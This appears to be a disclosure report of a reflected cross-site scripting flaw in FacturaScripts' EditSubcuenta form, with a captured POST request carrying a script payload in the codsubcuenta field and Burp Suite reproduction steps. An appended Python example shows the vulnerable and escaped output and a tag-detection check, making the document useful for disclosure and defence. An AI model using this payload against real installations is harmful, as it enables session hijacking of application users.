Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"
insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"
EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"
<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"
123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"
2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"
CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"
0
-----------------------------363416527826407339693188325960--
Steps to reproduce:
1. Go to the Accounting section, choose New and fill the whole form with any values.
2. Intercept this request with Burp Suite, change the codsubcuenta parameter value to the XSS payload, and click Forward.
3. alert(1337) executes.
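Added example (not part of this report and not FacturaScripts code): a Python script that parses a constructed multipart/form-data body shaped like the request above, shows the vulnerable echo of codsubcuenta beside the output-encoded version, and flags text fields that carry HTML tag syntax so such a request can be spotted in logs or a WAF. The subaccount code format used by is_valid_codsubcuenta is an assumption for illustration, not the application's real validation rule.

```python
import html
import re

# Constructed sample: a trimmed multipart body shaped like the EditSubcuenta
# request in the report (not a verbatim capture of the real traffic).
BOUNDARY = "---------------------------363416527826407339693188325960"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="action"\r\n\r\ninsert\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="codsubcuenta"\r\n\r\n'
    "<script>alert(1337)</script>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="descripcion"\r\n\r\n123123\r\n'
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for text fields (no file parts)."""
    fields = {}
    delimiter = f"--{boundary}"
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or closing "--" marker
            continue
        header_block, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', header_block)
        if match:
            fields[match.group(1)] = value
    return fields


def render_unsafe(fields: dict) -> str:
    """Vulnerable pattern: the submitted code is echoed straight into the page."""
    code = fields.get("codsubcuenta", "")
    return f'<input name="codsubcuenta" value="{code}">'


def render_safe(fields: dict) -> str:
    """Fixed pattern: HTML-encode the value for the attribute context on output."""
    code = html.escape(fields.get("codsubcuenta", ""), quote=True)
    return f'<input name="codsubcuenta" value="{code}">'


# Assumed (hypothetical) format for a subaccount code: letters, digits and dots,
# at most 15 characters. Input validation is defence in depth, not a substitute
# for output encoding.
CODSUBCUENTA_RE = re.compile(r"^[A-Za-z0-9.]{1,15}$")


def is_valid_codsubcuenta(code: str) -> bool:
    """Reject values that do not look like a subaccount code at all."""
    return CODSUBCUENTA_RE.match(code) is not None


# Detection helper: any text field containing the start of an HTML tag.
TAG_PATTERN = re.compile(r"<\s*/?\s*[A-Za-z]")


def suspicious_fields(fields: dict) -> list:
    """Return the names of form fields that carry HTML tag syntax."""
    return [name for name, value in fields.items() if TAG_PATTERN.search(value)]


if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("unsafe :", render_unsafe(parsed))
    print("safe   :", render_safe(parsed))
    print("valid  :", is_valid_codsubcuenta(parsed["codsubcuenta"]))
    print("flagged:", suspicious_fields(parsed))
```

The PHP equivalent of render_safe is htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') applied at the point where codsubcuenta is written back into the page; the parse-then-flag path is what a log review or WAF rule would run over the same request.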